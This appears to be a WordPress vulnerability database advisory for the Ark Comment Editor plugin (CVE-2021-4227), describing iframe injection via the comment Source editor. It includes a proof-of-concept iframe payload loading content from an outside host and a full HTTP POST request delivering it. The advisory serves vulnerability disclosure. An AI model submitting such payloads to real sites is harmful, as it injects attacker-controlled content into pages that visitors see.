WordPress Plugin Vulnerabilities

Ark Comment Editor <= 2.15.6 - Iframe Injection via Comment

Description

The plugin does not properly sanitise or encode the comments when in Source editor, allowing attackers to inject an iFrame in the page and thus load arbitrary content from any page to the comment section

Proof of Concept

Go to a post in the Frontend, select the 'Source' option in the Comment box generated by the plugin and add a payload such as <iframe src="http://brutelogic.com.br/poc.svg">

Depending on the user status (e.g unauthenticated), the comment might have to be approved first for the iframe to be loaded.

POST /wp-comments-post.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 131
Connection: close
Upgrade-Insecure-Requests: 1

comment=%3Ciframe+src%3D%22http%3A%2F%2Fbrutelogic.com.br%2Fpoc.svg%22%3E&submit=Post+Comment&comment_post_ID=5886&comment_parent=0

Affects Plugins

Plugin icon
ark-wysiwyg-comment-editor
No known fix

References

CVE
CVE-2021-4227

Classification

Type
CONTENT INJECTION
OWASP top 10
A1: Injection
CWE
CWE-345
CVSS
3.5 (low)

Miscellaneous

Original Researcher
Rasi Afeef
Submitter
Rasi Afeef
Verified
Yes
WPVDB ID
8d015eba-31dc-44cb-a051-4e95df782b75

Timeline

Publicly Published
2021-09-23 (about 2 years ago)
Added
2022-05-25 (about 1 years ago)
Last Updated
2023-02-21 (about 1 years ago)

Other

Published
Title
Published
2024-03-19
Title
WooCommerce POS < 1.4.12 - Insufficient Verification of Data Authenticity to Authenticated (Customer+) Information Disclosure
Published
2023-11-07
Title
ARI Stream Quiz < 1.3.3 - Contributor+ Content Injection
Published
2024-04-25
Title
Car Dealer < 4.16 - Admin+ Content Injection
Published
2024-02-20
Title
Tutor LMS < 2.6.1 - Student+ HTML Injection via Q&A
Published
2023-10-11
Title
Responsive Tabs < 4.0.6 - Authenticated (Contributor+) Content Injection